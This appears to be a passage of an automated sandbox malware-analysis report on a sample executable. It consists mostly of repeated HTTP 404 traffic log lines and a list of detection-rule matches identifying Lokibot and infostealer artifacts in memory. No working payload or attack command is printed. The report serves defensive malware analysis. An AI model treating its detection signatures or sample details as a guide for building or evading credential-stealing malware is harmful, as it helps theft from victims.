                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:38:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 07:39:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
                Source: kzQ25HVUbf.exe, 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, iWEWjTXiqXke.exe, 0000000A.00000002.1573168768.0000000002BB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: iWEWjTXiqXke.exe, iWEWjTXiqXke.exe, 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/

                System Summary

                barindex
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
